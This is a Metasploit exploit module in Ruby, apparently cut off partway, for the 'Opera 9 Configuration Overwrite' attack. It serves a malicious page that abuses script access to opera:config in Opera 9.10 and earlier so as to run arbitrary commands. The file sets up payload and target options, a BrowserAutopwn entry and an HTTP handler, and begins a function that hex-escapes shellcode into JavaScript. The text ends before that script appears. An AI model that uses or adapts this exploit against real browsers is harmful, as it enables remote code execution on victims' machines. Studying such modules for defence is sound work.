## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::OPERA, :ua_maxver => "9.10", :os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ], :javascript => true, :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself :vuln_test => nil, }) def initialize(info = {}) super(update_info(info,{ 'Name' => 'Opera 9 Configuration Overwrite', 'Description' => %q{ Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code. }, 'License' => BSD_LICENSE, 'Author' => [ 'egypt', # stolen from mpack ], 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66472'], ], 'Payload' => { 'ExitFunc' => 'process', 'Space' => 2048, 'DisableNops' => true, 'BadChars' => " ", }, 'Targets' => [ #[ 'Opera < 9.10 Windows', # { # 'Platform' => 'win', # 'Arch' => ARCH_X86, # } #], [ 'Opera < 9.10 Unix Cmd', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, } ], ], # Not sure when this was disclosed but it's been known since at # least March 5, 2007, since that's the release date on the version # of mpack I stole this from. 'DisclosureDate' => 'Mar 5 2007', 'DefaultTarget' => 0 })) end def on_request_uri(cli, request) print_status("Got request #{request.uri}") case request.uri when get_resource print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") content = "" headers = { 'Content-Type' => 'text/html' } else print_status("404ing request for #{request.uri}") send_not_found(cli) return end send_response_html(cli, content, headers) print_status("Done with request #{request.uri}") end def generate_evil_js(cli, request) # There are a bunch of levels of quotes here, so the easiest way to # make everything line up is to hex escape the command to run p = regenerate_payload(cli).encoded send_not_found(cli) && return if not p shellcode = Rex::Text.to_hex(p, "%") js = <